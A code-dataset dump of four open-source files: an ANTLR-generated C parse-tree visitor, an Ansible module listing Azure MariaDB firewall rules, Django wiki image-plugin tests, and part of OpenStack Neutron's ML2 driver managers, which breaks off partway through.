repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
smartanthill/plugin-handler-compiler | smartanthill_phc/antlr_parser/CVisitor.py | 2 | 11540 | # Generated from java-escape by ANTLR 4.5
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by CParser.
class CVisitor(ParseTreeVisitor):
# Visit a parse tree produced by CParser#FunctionExpression.
def visitFunctionExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#DotExpression.
def visitDotExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ParenthesizedExpression.
def visitParenthesizedExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#FloatingLiteralExpression.
def visitFloatingLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#PostIncrementExpression.
def visitPostIncrementExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#CharacterLiteralExpression.
def visitCharacterLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ArrowExpression.
def visitArrowExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IndexExpression.
def visitIndexExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#SizeOfTypeExpression.
def visitSizeOfTypeExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IdentifierExpression.
def visitIdentifierExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#UnaryOperatorExpression.
def visitUnaryOperatorExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IntegerLiteralExpression.
def visitIntegerLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#StringLiteralExpression.
def visitStringLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#PreIncrementExpression.
def visitPreIncrementExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#argumentExpressionList.
def visitArgumentExpressionList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#castExpression.
def visitCastExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#logicalOrExpression.
def visitLogicalOrExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#conditionalExpression.
def visitConditionalExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#assignmentExpression.
def visitAssignmentExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#constantExpression.
def visitConstantExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#declaration.
def visitDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#declarationSpecifier.
def visitDeclarationSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initDeclaratorList.
def visitInitDeclaratorList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initDeclarator.
def visitInitDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#storageClassSpecifier.
def visitStorageClassSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typeSpecifier.
def visitTypeSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structOrUnionSpecifier.
def visitStructOrUnionSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structOrUnion.
def visitStructOrUnion(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structDeclaration.
def visitStructDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#specifierQualifierList.
def visitSpecifierQualifierList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structDeclaratorList.
def visitStructDeclaratorList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structDeclarator.
def visitStructDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#enumSpecifier.
def visitEnumSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#enumeratorList.
def visitEnumeratorList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#enumerator.
def visitEnumerator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typeQualifier.
def visitTypeQualifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#functionSpecifier.
def visitFunctionSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#declarator.
def visitDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#directDeclarator.
def visitDirectDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#pointer.
def visitPointer(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#parameterTypeList.
def visitParameterTypeList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#parameterDeclaration.
def visitParameterDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typeName.
def visitTypeName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#abstractDeclarator.
def visitAbstractDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#directAbstractDeclarator.
def visitDirectAbstractDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typedefName.
def visitTypedefName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initializer.
def visitInitializer(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initializerList.
def visitInitializerList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#designation.
def visitDesignation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#designator.
def visitDesignator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#staticAssertDeclaration.
def visitStaticAssertDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#labeledStatement.
def visitLabeledStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#compoundStatement.
def visitCompoundStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#blockItem.
def visitBlockItem(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#expressionStatement.
def visitExpressionStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IfStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#SwitchStatement.
def visitSwitchStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initExpression.
def visitInitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#iterationExpression.
def visitIterationExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#WhileStatement.
def visitWhileStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#DoWhileStatement.
def visitDoWhileStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ForStatement.
def visitForStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#DeclForStatement.
def visitDeclForStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#GotoStatement.
def visitGotoStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ContinueStatement.
def visitContinueStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#BreakStatement.
def visitBreakStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ReturnStatement.
def visitReturnStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#compilationUnit.
def visitCompilationUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#externalDeclaration.
def visitExternalDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#functionDefinition.
def visitFunctionDefinition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#preprocessorDirective.
def visitPreprocessorDirective(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#includeDirective.
def visitIncludeDirective(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#defineConstantDirective.
def visitDefineConstantDirective(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#defineFunctionArgs.
def visitDefineFunctionArgs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#defineFunctionDirective.
def visitDefineFunctionDirective(self, ctx):
return self.visitChildren(ctx)
| gpl-2.0 |
apollo13/ansible | test/support/integration/plugins/modules/azure_rm_mariadbfirewallrule_info.py | 29 | 6309 | #!/usr/bin/python
#
# Copyright (c) 2018 Zim Kalinowski, <zikalino@microsoft.com>
# Copyright (c) 2019 Matti Ranta, (@techknowlogick)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mariadbfirewallrule_info
version_added: "2.9"
short_description: Get Azure MariaDB Firewall Rule facts
description:
- Get facts of Azure MariaDB Firewall Rule.
options:
resource_group:
description:
- The name of the resource group.
required: True
type: str
server_name:
description:
- The name of the server.
required: True
type: str
name:
description:
- The name of the server firewall rule.
type: str
extends_documentation_fragment:
- azure
author:
- Zim Kalinowski (@zikalino)
- Matti Ranta (@techknowlogick)
'''
EXAMPLES = '''
- name: Get instance of MariaDB Firewall Rule
azure_rm_mariadbfirewallrule_info:
resource_group: myResourceGroup
server_name: server_name
name: firewall_rule_name
- name: List instances of MariaDB Firewall Rule
azure_rm_mariadbfirewallrule_info:
resource_group: myResourceGroup
server_name: server_name
'''
RETURN = '''
rules:
description:
- A list of dictionaries containing facts for MariaDB Firewall Rule.
returned: always
type: complex
contains:
id:
description:
- Resource ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/TestGroup/providers/Microsoft.DBforMariaDB/servers/testserver/fire
wallRules/rule1"
server_name:
description:
- The name of the server.
returned: always
type: str
sample: testserver
name:
description:
- Resource name.
returned: always
type: str
sample: rule1
start_ip_address:
description:
- The start IP address of the MariaDB firewall rule.
returned: always
type: str
sample: 10.0.0.16
end_ip_address:
description:
- The end IP address of the MariaDB firewall rule.
returned: always
type: str
sample: 10.0.0.18
'''
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
from azure.mgmt.rdbms.mariadb import MariaDBManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class AzureRMMariaDbFirewallRuleInfo(AzureRMModuleBase):
def __init__(self):
# define user inputs into argument
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str'
)
)
# store the results of the module operation
self.results = dict(
changed=False
)
self.mgmt_client = None
self.resource_group = None
self.server_name = None
self.name = None
super(AzureRMMariaDbFirewallRuleInfo, self).__init__(self.module_arg_spec, supports_tags=False)
def exec_module(self, **kwargs):
is_old_facts = self.module._name == 'azure_rm_mariadbfirewallrule_facts'
if is_old_facts:
self.module.deprecate("The 'azure_rm_mariadbfirewallrule_facts' module has been renamed to 'azure_rm_mariadbfirewallrule_info'", version='2.13')
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
self.mgmt_client = self.get_mgmt_svc_client(MariaDBManagementClient,
base_url=self._cloud_environment.endpoints.resource_manager)
if (self.name is not None):
self.results['rules'] = self.get()
else:
self.results['rules'] = self.list_by_server()
return self.results
def get(self):
response = None
results = []
try:
response = self.mgmt_client.firewall_rules.get(resource_group_name=self.resource_group,
server_name=self.server_name,
firewall_rule_name=self.name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.log('Could not get facts for FirewallRules.')
if response is not None:
results.append(self.format_item(response))
return results
def list_by_server(self):
response = None
results = []
try:
response = self.mgmt_client.firewall_rules.list_by_server(resource_group_name=self.resource_group,
server_name=self.server_name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.log('Could not get facts for FirewallRules.')
if response is not None:
for item in response:
results.append(self.format_item(item))
return results
def format_item(self, item):
d = item.as_dict()
d = {
'resource_group': self.resource_group,
'id': d['id'],
'server_name': self.server_name,
'name': d['name'],
'start_ip_address': d['start_ip_address'],
'end_ip_address': d['end_ip_address']
}
return d
def main():
AzureRMMariaDbFirewallRuleInfo()
if __name__ == '__main__':
main()
| gpl-3.0 |
nert-gu/Xposition | tests/plugins/images/test_views.py | 1 | 9004 | import base64
import os
from io import BytesIO
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.urls import reverse
from PIL import Image
from wiki.core.plugins import registry as plugin_registry
from wiki.models import URLPath
from wiki.plugins.images import models
from wiki.plugins.images.wiki_plugin import ImagePlugin
from ...base import ArticleWebTestUtils, DjangoClientTestBase, RequireRootArticleMixin, wiki_override_settings
class ImageTests(RequireRootArticleMixin, ArticleWebTestUtils, DjangoClientTestBase):
def setUp(self):
super().setUp()
self.article = self.root_article
# A black 1x1 gif
self.test_data = "R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs="
def _create_gif_filestream_from_base64(self, str_base64, **kwargs):
"""
Helper function to create filestream for upload.
Parameters :
strData : str, test string data
Optional Arguments :
filename : str, Defaults to 'test.txt'
"""
filename = kwargs.get('filename', 'test.gif')
data = base64.b64decode(str_base64)
filedata = BytesIO(data)
filestream = InMemoryUploadedFile(
filedata,
None,
filename,
'image',
len(data),
None
)
return filestream
def _create_test_image(self, path):
# Get the form index
plugin_index = -1
for cnt, plugin_instance in enumerate(plugin_registry.get_sidebar()):
if isinstance(plugin_instance, ImagePlugin):
plugin_index = cnt
break
self.assertTrue(plugin_index >= 0, "Image plugin not activated")
base_edit_url = reverse('wiki:edit', kwargs={'path': path})
url = base_edit_url + '?f=form{0:d}'.format(plugin_index)
filestream = self._create_gif_filestream_from_base64(self.test_data)
response = self.client.post(
url,
{
'unsaved_article_title': self.article.current_revision.title,
'unsaved_article_content': self.article.current_revision.content,
'image': filestream,
'images_save': '1',
},
)
self.assertRedirects(response, base_edit_url)
def test_index(self):
url = reverse('wiki:images_index', kwargs={'path': ''})
response = self.client.get(url,)
self.assertContains(response, 'Images')
def test_upload(self):
"""
Tests that simple file upload uploads correctly
Uploading a file should preserve the original filename.
Uploading should not modify file in any way.
"""
self._create_test_image('')
# Check the object was created.
image = models.Image.objects.get()
image_revision = image.current_revision.imagerevision
self.assertEqual(image_revision.get_filename(), 'test.gif')
self.assertEqual(
image_revision.image.file.read(),
base64.b64decode(self.test_data)
)
def get_article(self, cont, image):
urlpath = URLPath.create_urlpath(
URLPath.root(),
"html_image",
title="TestImage",
content=cont
)
if image:
self._create_test_image(urlpath.path)
return urlpath.article.render()
def test_image_missing(self):
output = self.get_article("[image:1]", False)
expected = (
'<figure class="thumbnail"><a href="">'
'<div class="caption"><em>Image not found</em></div>'
'</a><figcaption class="caption"></figcaption></figure>'
)
self.assertEqual(output, expected)
def test_image_default(self):
output = self.get_article("[image:1]", True)
image_rev = models.Image.objects.get().current_revision.imagerevision
expected = (
'<figure class="thumbnail">'
'<a href="' + image_rev.image.name + '">'
'<img alt="test\.gif" src="cache/.*\.jpg">'
'</a><figcaption class="caption"></figcaption></figure>'
)
self.assertRegexpMatches(output, expected)
def test_image_large_right(self):
output = self.get_article("[image:1 align:right size:large]", True)
image_rev = models.Image.objects.get().current_revision.imagerevision
expected = (
'<figure class="thumbnail pull-right">'
'<a href="' + image_rev.image.name + '">'
'<img alt="test\.gif" src="cache/.*\.jpg"></a>'
'<figcaption class="caption"></figcaption></figure>'
)
self.assertRegexpMatches(output, expected)
def test_image_orig(self):
output = self.get_article("[image:1 size:orig]", True)
image_rev = models.Image.objects.get().current_revision.imagerevision
expected = (
'<figure class="thumbnail">'
'<a href="' + image_rev.image.name + '">'
'<img alt="test.gif" src="' + image_rev.image.name + '"></a>'
'<figcaption class="caption"></figcaption></figure>'
)
self.assertEqual(output, expected)
# https://gist.github.com/guillaumepiot/817a70706587da3bd862835c59ef584e
def generate_photo_file(self):
file = BytesIO()
image = Image.new('RGBA', size=(100, 100), color=(155, 0, 0))
image.save(file, 'gif')
file.name = 'test.gif'
file.seek(0)
return file
def test_add_revision(self):
self._create_test_image(path='')
image = models.Image.objects.get()
before_edit_rev = image.current_revision.revision_number
response = self.client.post(
reverse('wiki:images_add_revision', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
data={'image': self.generate_photo_file()}
)
self.assertRedirects(
response, reverse('wiki:edit', kwargs={'path': ''})
)
image = models.Image.objects.get()
self.assertEqual(models.Image.objects.count(), 1)
self.assertEqual(image.current_revision.previous_revision.revision_number, before_edit_rev)
def test_delete_restore_revision(self):
self._create_test_image(path='')
image = models.Image.objects.get()
before_edit_rev = image.current_revision.revision_number
response = self.client.get(
reverse('wiki:images_delete', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
)
self.assertRedirects(
response, reverse('wiki:images_index', kwargs={'path': ''})
)
image = models.Image.objects.get()
self.assertEqual(models.Image.objects.count(), 1)
self.assertEqual(image.current_revision.previous_revision.revision_number, before_edit_rev)
self.assertTrue(image.current_revision.deleted)
# RESTORE
before_edit_rev = image.current_revision.revision_number
response = self.client.get(
reverse('wiki:images_restore', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
)
self.assertRedirects(
response, reverse('wiki:images_index', kwargs={'path': ''})
)
image = models.Image.objects.get()
self.assertEqual(models.Image.objects.count(), 1)
self.assertEqual(image.current_revision.previous_revision.revision_number, before_edit_rev)
self.assertFalse(image.current_revision.deleted)
def test_purge(self):
"""
Tests that an image is really purged
"""
self._create_test_image(path='')
image = models.Image.objects.get()
image_revision = image.current_revision.imagerevision
f_path = image_revision.image.file.name
self.assertTrue(os.path.exists(f_path))
response = self.client.post(
reverse('wiki:images_purge', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
data={'confirm': True}
)
self.assertRedirects(
response, reverse('wiki:images_index', kwargs={'path': ''})
)
self.assertEqual(models.Image.objects.count(), 0)
self.assertFalse(os.path.exists(f_path))
@wiki_override_settings(ACCOUNT_HANDLING=True)
def test_login_on_revision_add(self):
self._create_test_image(path='')
self.client.logout()
image = models.Image.objects.get()
url = reverse('wiki:images_add_revision', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
})
response = self.client.post(url, data={'image': self.generate_photo_file()})
self.assertRedirects(response, '{}?next={}'.format(reverse('wiki:login'), url))
| gpl-3.0 |
kongseokhwan/kulcloud-iitp-neutron | neutron/plugins/ml2/managers.py | 1 | 36204 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log
import stevedore
from neutron.api.v2 import attributes
from neutron.common import exceptions as exc
from neutron.extensions import multiprovidernet as mpnet
from neutron.extensions import portbindings
from neutron.extensions import providernet as provider
from neutron.extensions import vlantransparent
from neutron.i18n import _LE, _LI
from neutron.plugins.ml2.common import exceptions as ml2_exc
from neutron.plugins.ml2 import db
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2 import models
LOG = log.getLogger(__name__)
MAX_BINDING_LEVELS = 10
class TypeManager(stevedore.named.NamedExtensionManager):
"""Manage network segment types using drivers."""
def __init__(self):
# Mapping from type name to DriverManager
self.drivers = {}
LOG.info(_LI("Configured type driver names: %s"),
cfg.CONF.ml2.type_drivers)
super(TypeManager, self).__init__('neutron.ml2.type_drivers',
cfg.CONF.ml2.type_drivers,
invoke_on_load=True)
LOG.info(_LI("Loaded type driver names: %s"), self.names())
self._register_types()
self._check_tenant_network_types(cfg.CONF.ml2.tenant_network_types)
def _register_types(self):
for ext in self:
network_type = ext.obj.get_type()
if network_type in self.drivers:
LOG.error(_LE("Type driver '%(new_driver)s' ignored because"
" type driver '%(old_driver)s' is already"
" registered for type '%(type)s'"),
{'new_driver': ext.name,
'old_driver': self.drivers[network_type].name,
'type': network_type})
else:
self.drivers[network_type] = ext
LOG.info(_LI("Registered types: %s"), self.drivers.keys())
def _check_tenant_network_types(self, types):
self.tenant_network_types = []
for network_type in types:
if network_type in self.drivers:
self.tenant_network_types.append(network_type)
else:
LOG.error(_LE("No type driver for tenant network_type: %s. "
"Service terminated!"), network_type)
raise SystemExit(1)
LOG.info(_LI("Tenant network_types: %s"), self.tenant_network_types)
def _process_provider_segment(self, segment):
(network_type, physical_network,
segmentation_id) = (self._get_attribute(segment, attr)
for attr in provider.ATTRIBUTES)
if attributes.is_attr_set(network_type):
segment = {api.NETWORK_TYPE: network_type,
api.PHYSICAL_NETWORK: physical_network,
api.SEGMENTATION_ID: segmentation_id}
self.validate_provider_segment(segment)
return segment
msg = _("network_type required")
raise exc.InvalidInput(error_message=msg)
def _process_provider_create(self, network):
if any(attributes.is_attr_set(network.get(attr))
for attr in provider.ATTRIBUTES):
# Verify that multiprovider and provider attributes are not set
# at the same time.
if attributes.is_attr_set(network.get(mpnet.SEGMENTS)):
raise mpnet.SegmentsSetInConjunctionWithProviders()
segment = self._get_provider_segment(network)
return [self._process_provider_segment(segment)]
elif attributes.is_attr_set(network.get(mpnet.SEGMENTS)):
segments = [self._process_provider_segment(s)
for s in network[mpnet.SEGMENTS]]
mpnet.check_duplicate_segments(
segments,
self.is_partial_segment)
return segments
def _match_segment(self, segment, filters):
return all(not filters.get(attr) or segment.get(attr) in filters[attr]
for attr in provider.ATTRIBUTES)
def _get_provider_segment(self, network):
# TODO(manishg): Placeholder method
# Code intended for operating on a provider segment should use
# this method to extract the segment, even though currently the
# segment attributes are part of the network dictionary. In the
# future, network and segment information will be decoupled and
# here we will do the job of extracting the segment information.
return network
def network_matches_filters(self, network, filters):
if not filters:
return True
if any(attributes.is_attr_set(network.get(attr))
for attr in provider.ATTRIBUTES):
segments = [self._get_provider_segment(network)]
elif attributes.is_attr_set(network.get(mpnet.SEGMENTS)):
segments = self._get_attribute(network, mpnet.SEGMENTS)
else:
return True
return any(self._match_segment(s, filters) for s in segments)
def _get_attribute(self, attrs, key):
value = attrs.get(key)
if value is attributes.ATTR_NOT_SPECIFIED:
value = None
return value
def extend_network_dict_provider(self, context, network):
id = network['id']
segments = db.get_network_segments(context.session, id)
if not segments:
LOG.error(_LE("Network %s has no segments"), id)
for attr in provider.ATTRIBUTES:
network[attr] = None
elif len(segments) > 1:
network[mpnet.SEGMENTS] = [
{provider.NETWORK_TYPE: segment[api.NETWORK_TYPE],
provider.PHYSICAL_NETWORK: segment[api.PHYSICAL_NETWORK],
provider.SEGMENTATION_ID: segment[api.SEGMENTATION_ID]}
for segment in segments]
else:
segment = segments[0]
network[provider.NETWORK_TYPE] = segment[api.NETWORK_TYPE]
network[provider.PHYSICAL_NETWORK] = segment[api.PHYSICAL_NETWORK]
network[provider.SEGMENTATION_ID] = segment[api.SEGMENTATION_ID]
def initialize(self):
for network_type, driver in self.drivers.iteritems():
LOG.info(_LI("Initializing driver for type '%s'"), network_type)
driver.obj.initialize()
def create_network_segments(self, context, network, tenant_id):
"""Call type drivers to create network segments."""
segments = self._process_provider_create(network)
session = context.session
mtu = []
with session.begin(subtransactions=True):
network_id = network['id']
if segments:
for segment_index, segment in enumerate(segments):
segment = self.reserve_provider_segment(
session, segment)
db.add_network_segment(session, network_id,
segment, segment_index)
if segment.get(api.MTU) > 0:
mtu.append(segment[api.MTU])
else:
segment = self.allocate_tenant_segment(session)
db.add_network_segment(session, network_id, segment)
if segment.get(api.MTU) > 0:
mtu.append(segment[api.MTU])
network[api.MTU] = min(mtu) if mtu else 0
def is_partial_segment(self, segment):
network_type = segment[api.NETWORK_TYPE]
driver = self.drivers.get(network_type)
if driver:
return driver.obj.is_partial_segment(segment)
else:
msg = _("network_type value '%s' not supported") % network_type
raise exc.InvalidInput(error_message=msg)
def validate_provider_segment(self, segment):
network_type = segment[api.NETWORK_TYPE]
driver = self.drivers.get(network_type)
if driver:
driver.obj.validate_provider_segment(segment)
else:
msg = _("network_type value '%s' not supported") % network_type
raise exc.InvalidInput(error_message=msg)
def reserve_provider_segment(self, session, segment):
network_type = segment.get(api.NETWORK_TYPE)
driver = self.drivers.get(network_type)
return driver.obj.reserve_provider_segment(session, segment)
def allocate_tenant_segment(self, session):
for network_type in self.tenant_network_types:
driver = self.drivers.get(network_type)
segment = driver.obj.allocate_tenant_segment(session)
if segment:
return segment
raise exc.NoNetworkAvailable()
def release_network_segments(self, session, network_id):
segments = db.get_network_segments(session, network_id,
filter_dynamic=None)
for segment in segments:
network_type = segment.get(api.NETWORK_TYPE)
driver = self.drivers.get(network_type)
if driver:
driver.obj.release_segment(session, segment)
else:
LOG.error(_LE("Failed to release segment '%s' because "
"network type is not supported."), segment)
def allocate_dynamic_segment(self, session, network_id, segment):
"""Allocate a dynamic segment using a partial or full segment dict."""
dynamic_segment = db.get_dynamic_segment(
session, network_id, segment.get(api.PHYSICAL_NETWORK),
segment.get(api.SEGMENTATION_ID))
if dynamic_segment:
return dynamic_segment
driver = self.drivers.get(segment.get(api.NETWORK_TYPE))
dynamic_segment = driver.obj.reserve_provider_segment(session, segment)
db.add_network_segment(session, network_id, dynamic_segment,
is_dynamic=True)
return dynamic_segment
def release_dynamic_segment(self, session, segment_id):
"""Delete a dynamic segment."""
segment = db.get_segment_by_id(session, segment_id)
if segment:
driver = self.drivers.get(segment.get(api.NETWORK_TYPE))
if driver:
driver.obj.release_segment(session, segment)
db.delete_network_segment(session, segment_id)
else:
LOG.error(_LE("Failed to release segment '%s' because "
"network type is not supported."), segment)
else:
LOG.debug("No segment found with id %(segment_id)s", segment_id)
class MechanismManager(stevedore.named.NamedExtensionManager):
"""Manage networking mechanisms using drivers."""
def __init__(self):
# Registered mechanism drivers, keyed by name.
self.mech_drivers = {}
# Ordered list of mechanism drivers, defining
# the order in which the drivers are called.
self.ordered_mech_drivers = []
LOG.info(_LI("Configured mechanism driver names: %s"),
cfg.CONF.ml2.mechanism_drivers)
super(MechanismManager, self).__init__('neutron.ml2.mechanism_drivers',
cfg.CONF.ml2.mechanism_drivers,
invoke_on_load=True,
name_order=True)
LOG.info(_LI("Loaded mechanism driver names: %s"), self.names())
self._register_mechanisms()
def _register_mechanisms(self):
"""Register all mechanism drivers.
This method should only be called once in the MechanismManager
constructor.
"""
for ext in self:
self.mech_drivers[ext.name] = ext
self.ordered_mech_drivers.append(ext)
LOG.info(_LI("Registered mechanism drivers: %s"),
[driver.name for driver in self.ordered_mech_drivers])
def initialize(self):
for driver in self.ordered_mech_drivers:
LOG.info(_LI("Initializing mechanism driver '%s'"), driver.name)
driver.obj.initialize()
def _check_vlan_transparency(self, context):
"""Helper method for checking vlan transparecncy support.
:param context: context parameter to pass to each method call
:raises: neutron.extensions.vlantransparent.
VlanTransparencyDriverError if any mechanism driver doesn't
support vlan transparency.
"""
if context.current['vlan_transparent'] is None:
return
if context.current['vlan_transparent']:
for driver in self.ordered_mech_drivers:
if not driver.obj.check_vlan_transparency(context):
raise vlantransparent.VlanTransparencyDriverError()
def _call_on_drivers(self, method_name, context,
continue_on_failure=False):
"""Helper method for calling a method across all mechanism drivers.
:param method_name: name of the method to call
:param context: context parameter to pass to each method call
:param continue_on_failure: whether or not to continue to call
all mechanism drivers once one has raised an exception
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver call fails.
"""
error = False
for driver in self.ordered_mech_drivers:
try:
getattr(driver.obj, method_name)(context)
except Exception:
LOG.exception(
_LE("Mechanism driver '%(name)s' failed in %(method)s"),
{'name': driver.name, 'method': method_name}
)
error = True
if not continue_on_failure:
break
if error:
raise ml2_exc.MechanismDriverError(
method=method_name
)
def create_network_precommit(self, context):
"""Notify all mechanism drivers during network creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_network_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._check_vlan_transparency(context)
self._call_on_drivers("create_network_precommit", context)
def create_network_postcommit(self, context):
"""Notify all mechanism drivers after network creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_network_postcommit call fails.
Called after the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propagated
to the caller, where the network will be deleted, triggering
any required cleanup. There is no guarantee that all mechanism
drivers are called in this case.
"""
self._call_on_drivers("create_network_postcommit", context)
def update_network_precommit(self, context):
"""Notify all mechanism drivers during network update.
